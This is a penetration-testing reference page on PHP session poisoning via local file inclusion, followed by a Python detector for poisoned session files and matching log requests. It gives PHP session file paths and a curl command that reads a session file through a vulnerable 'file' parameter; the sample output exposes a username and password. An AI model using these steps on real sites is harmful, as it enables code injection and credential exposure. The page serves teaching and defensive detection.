PHP Sessions

Theory

If the website uses PHP sessions (PHPSESSID), we may poison the cookies and include the session file through LFI.

Practice

First, we should find where the sessions are stored, for example:

# Linux
/var/lib/php5/sess_[PHPSESSID]
/var/lib/php/sessions/sess_[PHPSESSID]

# Windows 
C:\Windows\Temp\sess_[PHPSESSID]

Second, display the session file of a PHPSESSID to see whether any parameter is reflected inside:

curl "$URL/?file=/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27"
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";

In this case, we can inject some PHP code in the reflected parameter in the session.
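From the defending side, this technique leaves two artefacts: a session file whose stored value contains a PHP opening tag, and a request whose parameter points at a session path. The Python below is an added example, not part of the original page. It parses the default `php` session format by length prefix and flags both artefacts. The function names, sample session data and log lines are constructed, and only scalar session values are handled.

```python
import re
from urllib.parse import unquote

# Session locations listed on this page; adjust to the host's session.save_path.
SESSION_FILE_RE = re.compile(
    r"(/var/lib/php5/|/var/lib/php/sessions/|[a-z]:\\windows\\temp\\)sess_[a-z0-9,-]+",
    re.I)
PHP_OPEN_TAG_RE = re.compile(rb"<\?")  # covers <?php, <?= and short open tags

def parse_session(raw: bytes) -> dict:
    """Parse name|value pairs of PHP's default 'php' session format (scalars only)."""
    fields, pos = {}, 0
    while pos < len(raw):
        bar = raw.index(b"|", pos)
        name, pos = raw[pos:bar].decode("latin-1"), bar + 1
        kind = raw[pos:pos + 1]
        if kind == b"s":                    # s:<len>:"<bytes>";
            colon = raw.index(b":", pos + 2)
            length = int(raw[pos + 2:colon])
            start = colon + 2               # skip :"
            value, pos = raw[start:start + length], start + length + 2
        elif kind == b"N":                  # N;
            value, pos = None, pos + 2
        elif kind in (b"i", b"b", b"d"):    # i:1; b:0; d:0.5;
            end = raw.index(b";", pos)
            value, pos = raw[pos + 2:end], end + 1
        else:                               # arrays/objects are out of scope here
            raise ValueError(f"unsupported type {kind!r} at offset {pos}")
        fields[name] = value
    return fields

def poisoned_fields(raw: bytes) -> list:
    """Names of session fields whose stored value contains a PHP opening tag."""
    return [k for k, v in parse_session(raw).items() if v and PHP_OPEN_TAG_RE.search(v)]

def session_include_requests(log_lines) -> list:
    """Access-log lines whose URL-decoded request points at a session file."""
    return [line for line in log_lines if SESSION_FILE_RE.search(unquote(line))]

# Constructed samples, not captured from a real system.
CLEAN = b'loggedin|b:1;lang|s:9:"en_us.php";user|s:5:"admin";'
TAINTED = b'loggedin|b:1;lang|s:28:"<?php /* constructed */ ?>|x";user|s:5:"admin";'
LOGS = [
    '"GET /?file=/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27 HTTP/1.1" 200 512',
    '"GET /?file=en_us.php HTTP/1.1" 200 2048',
    '"GET /?file=..%2F..%2Fvar%2Flib%2Fphp%2Fsessions%2Fsess_abc123 HTTP/1.1" 200 498',
]

if __name__ == "__main__":
    print(poisoned_fields(CLEAN), poisoned_fields(TAINTED))
    print(session_include_requests(LOGS))
```

Reading by length prefix matters because a stored string may itself contain `|` or `";`, which would mislead a parser that splits on those characters.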
